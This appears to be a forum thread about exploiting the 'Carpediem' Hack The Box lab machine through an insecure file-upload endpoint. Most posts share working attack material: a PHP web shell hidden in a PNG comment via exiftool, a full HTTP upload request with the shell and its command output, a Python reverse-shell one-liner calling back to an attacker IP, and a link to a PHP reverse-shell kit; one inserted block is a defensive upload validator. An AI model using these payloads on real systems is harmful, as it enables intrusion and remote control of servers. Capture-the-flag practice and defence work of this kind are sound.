Carpediem - HTB [Discussion]
(June 25, 2022, 09:08 PM)0xpwny Wrote:
(June 25, 2022, 09:04 PM)Toto Wrote:
(June 25, 2022, 08:57 PM)hacker1111 Wrote:
(June 25, 2022, 08:50 PM)Toto Wrote:
(June 25, 2022, 08:40 PM)hacker1111 Wrote:
https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html


change .jpg/.png to .php in Burp and right-click on the broken image for the full path


Doesn't seem to work; I tried uploading .php.jpg and .php but can't seem to reach the file afterwards.


use .png file

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' random.png


and in Burp just change the extension from .png to .php and send
refresh the /admin user profile page and right-click on the broken image for the full path


Can't seem to execute anything. Did you succeed in getting anything?


I can't intercept the request for uploading the image in Burp.


Ensure intercept is on and click upload xD
Reply
(June 25, 2022, 09:08 PM)0xpwny Wrote:
(June 25, 2022, 09:04 PM)Toto Wrote:
(June 25, 2022, 08:57 PM)hacker1111 Wrote:
(June 25, 2022, 08:50 PM)Toto Wrote:
(June 25, 2022, 08:40 PM)hacker1111 Wrote:
https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html


change .jpg/.png to .php in Burp and right-click on the broken image for the full path


Doesn't seem to work; I tried uploading .php.jpg and .php but can't seem to reach the file afterwards.


use .png file

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' random.png


and in Burp just change the extension from .png to .php and send
refresh the /admin user profile page and right-click on the broken image for the full path


Can't seem to execute anything. Did you succeed in getting anything?


I can't intercept the request for uploading the image in Burp.


Make sure to click on the account in the admin panel and then click "My Account",
or simply go to this link:
http://portal.carpediem.htb/admin/?page=user
Reply
(June 25, 2022, 08:54 PM)langetmama11 Wrote: On the quarterly sales report it seems like we can add files.

By intercepting the request in Burp, it says: {"error":"multipart\/form-data missing"}

We can play with that and see if we can upload a shell


I got code execution.

POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://portal.carpediem.htb
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files
Cookie: PHPSESSID=72ba94afdcf92c650a68d90b6cedda1e
Content-Length: 271
Content-Type: multipart/form-data; boundary=---------------------------355590062441708822781859836639

-----------------------------355590062441708822781859836639
Content-Disposition: form-data; name="file_upload"; filename="test.php"
Content-Type: image/jpeg

<?php echo "<pre>"; system($_GET['cmd']); ?>
-----------------------------355590062441708822781859836639--


http://portal.carpediem.htb/uploads/1656191700_test.php?cmd=id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reply
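The request quoted above is the pattern a defender wants the server to refuse: the part's filename says .php, its declared Content-Type says image/jpeg, and its bytes are neither a JPEG nor a PNG. As an added example (not from the thread, the box, or its PHP code), this Python validator parses a multipart/form-data body and rejects both tricks discussed in the thread: the renamed .php upload and the real PNG carrying a PHP tag in a comment; the boundary, field name and sample bodies are constructed here.

```python
import re

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}   # what an image-only endpoint should accept
MAGIC = {b"\xff\xd8\xff": "image/jpeg", b"\x89PNG\r\n\x1a\n": "image/png",
         b"GIF87a": "image/gif", b"GIF89a": "image/gif"}
BOUNDARY = "constructedBoundary"  # constructed; the thread's boundary is a long random token

def parse_multipart(body: bytes, boundary: str):
    """Yield (headers, content) for each part of a multipart/form-data body."""
    for seg in body.split(b"--" + boundary.encode())[1:]:
        if seg.startswith(b"--"):        # closing delimiter: no more parts
            break
        head, _, content = seg[2:].partition(b"\r\n\r\n")  # seg[2:] drops the leading CRLF
        headers = {k.strip().lower(): v.strip() for k, _, v in
                   (ln.decode("latin-1").partition(":") for ln in head.split(b"\r\n"))}
        yield headers, content[:-2] if content.endswith(b"\r\n") else content

def check_part(headers: dict, content: bytes):
    """Return (filename, problems); an empty problems list means the part is acceptable."""
    problems = []
    m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    filename = m.group(1) if m else ""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:           # rejects test.php; x.php.jpg passes here but fails below
        problems.append(f"extension {ext!r} not in allowlist")
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    sniffed = next((t for sig, t in MAGIC.items() if content.startswith(sig)), None)
    if sniffed is None or sniffed != declared:  # never trust the client-declared type alone
        problems.append(f"declared {declared} but content looks like {sniffed}")
    if b"<?php" in content or b"<?=" in content:  # tag hidden inside a valid image (EXIF/tEXt comment)
        problems.append("content contains a PHP open tag")
    return filename, problems

def check_upload(body: bytes, boundary: str = BOUNDARY) -> list:
    """Validate every part; accepted files should also be stored under a server-generated name."""
    return [check_part(h, c) for h, c in parse_multipart(body, boundary)]

def build_body(filename: str, ctype: str, content: bytes) -> bytes:
    """Constructed one-part body shaped like the request quoted in the thread."""
    head = (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="file_upload"; '
            f'filename="{filename}"\r\nContent-Type: {ctype}\r\n\r\n')
    return head.encode() + content + f"\r\n--{BOUNDARY}--\r\n".encode()

# Constructed samples: PHP declared as JPEG, a real PNG carrying a PHP tag, and a clean PNG.
SAMPLES = {
    "php_as_jpeg": build_body("test.php", "image/jpeg", b"<?php echo 'not an image'; ?>"),
    "png_with_tag": build_body("random.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"tEXt<?php echo 1; ?>"),
    "clean_png": build_body("avatar.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
}
```

`check_upload(SAMPLES["php_as_jpeg"])` flags the extension, the missing image signature and the PHP tag, while the clean PNG passes with an empty list.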
(June 25, 2022, 08:57 PM)hacker1111 Wrote:
(June 25, 2022, 08:50 PM)Toto Wrote:
(June 25, 2022, 08:40 PM)hacker1111 Wrote:
(June 25, 2022, 08:36 PM)Toto Wrote:
(June 25, 2022, 08:31 PM)hacker1111 Wrote: update your profile and intercept the request in Burp


Okay thanks, missed it for some reason. Anyone got any success with uploading images?


https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html


change .jpg/.png to .php in Burp and right-click on the broken image for the full path


Doesn't seem to work; I tried uploading .php.jpg and .php but can't seem to reach the file afterwards.


use .png file

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' random.png


and in Burp just change the extension from .png to .php and send
refresh the /admin user profile page and right-click on the broken image for the full path


Were you able to execute a command?
Reply
(June 25, 2022, 09:17 PM)Exa Wrote:
(June 25, 2022, 08:54 PM)langetmama11 Wrote: On the quarterly sales report it seems like we can add files.

By intercepting the request in Burp, it says: {"error":"multipart\/form-data missing"}

We can play with that and see if we can upload a shell


I got code execution.

POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://portal.carpediem.htb
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files
Cookie: PHPSESSID=72ba94afdcf92c650a68d90b6cedda1e
Content-Length: 271
Content-Type: multipart/form-data; boundary=---------------------------355590062441708822781859836639

-----------------------------355590062441708822781859836639
Content-Disposition: form-data; name="file_upload"; filename="test.php"
Content-Type: image/jpeg

<?php echo "<pre>"; system($_GET['cmd']); ?>
-----------------------------355590062441708822781859836639--


http://portal.carpediem.htb/uploads/1656191700_test.php?cmd=id

uid=33(www-data) gid=33(www-data) groups=33(www-data)


Same, trying to get a reverse shell.
Reply
(June 25, 2022, 09:17 PM)Toto Wrote:
(June 25, 2022, 09:17 PM)Exa Wrote:
(June 25, 2022, 08:54 PM)langetmama11 Wrote: On the quarterly sales report it seems like we can add files.

By intercepting the request in Burp, it says: {"error":"multipart\/form-data missing"}

We can play with that and see if we can upload a shell


I got code execution.

POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://portal.carpediem.htb
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files
Cookie: PHPSESSID=72ba94afdcf92c650a68d90b6cedda1e
Content-Length: 271
Content-Type: multipart/form-data; boundary=---------------------------355590062441708822781859836639

-----------------------------355590062441708822781859836639
Content-Disposition: form-data; name="file_upload"; filename="test.php"
Content-Type: image/jpeg

<?php echo "<pre>"; system($_GET['cmd']); ?>
-----------------------------355590062441708822781859836639--


http://portal.carpediem.htb/uploads/1656191700_test.php?cmd=id

uid=33(www-data) gid=33(www-data) groups=33(www-data)


Same, trying to get a reverse shell.


http://portal.carpediem.htb/uploads/shell.php?cmd=export%20RHOST=%2210.10.x.x%22;export%20RPORT=9001;python3%20-c%20%27import%20sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(%22RHOST%22),int(os.getenv(%22RPORT%22))));[os.dup2(s.fileno(),fd)%20for%20fd%20in%20(0,1,2)];pty.spawn(%22bash%22)%27
Reply
(June 25, 2022, 09:21 PM)hacker1111 Wrote:
(June 25, 2022, 09:17 PM)Toto Wrote:
(June 25, 2022, 09:17 PM)Exa Wrote:
(June 25, 2022, 08:54 PM)langetmama11 Wrote: On the quarterly sales report it seems like we can add files.

By intercepting the request in Burp, it says: {"error":"multipart\/form-data missing"}

We can play with that and see if we can upload a shell


I got code execution.

POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://portal.carpediem.htb
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files
Cookie: PHPSESSID=72ba94afdcf92c650a68d90b6cedda1e
Content-Length: 271
Content-Type: multipart/form-data; boundary=---------------------------355590062441708822781859836639

-----------------------------355590062441708822781859836639
Content-Disposition: form-data; name="file_upload"; filename="test.php"
Content-Type: image/jpeg

<?php echo "<pre>"; system($_GET['cmd']); ?>
-----------------------------355590062441708822781859836639--


http://portal.carpediem.htb/uploads/1656191700_test.php?cmd=id

uid=33(www-data) gid=33(www-data) groups=33(www-data)


Same, trying to get a reverse shell.


export RHOST="10.10.x.x";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'


You put that in the comment section?
Reply
(June 25, 2022, 09:17 PM)Exa Wrote:
(June 25, 2022, 08:54 PM)langetmama11 Wrote: On the quarterly sales report it seems like we can add files.

By intercepting the request in Burp, it says: {"error":"multipart\/form-data missing"}

We can play with that and see if we can upload a shell


I got code execution.

POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://portal.carpediem.htb
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files
Cookie: PHPSESSID=72ba94afdcf92c650a68d90b6cedda1e
Content-Length: 271
Content-Type: multipart/form-data; boundary=---------------------------355590062441708822781859836639

-----------------------------355590062441708822781859836639
Content-Disposition: form-data; name="file_upload"; filename="test.php"
Content-Type: image/jpeg

<?php echo "<pre>"; system($_GET['cmd']); ?>
-----------------------------355590062441708822781859836639--


http://portal.carpediem.htb/uploads/1656191700_test.php?cmd=id

uid=33(www-data) gid=33(www-data) groups=33(www-data)


Nice, that note saying "still in development" was sus.

Let's get a proper shell now
Reply
Use this revshell

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

and replace the contents in Burp Suite
Reply
Another subdomain

trudesk.carpediem.htb
Reply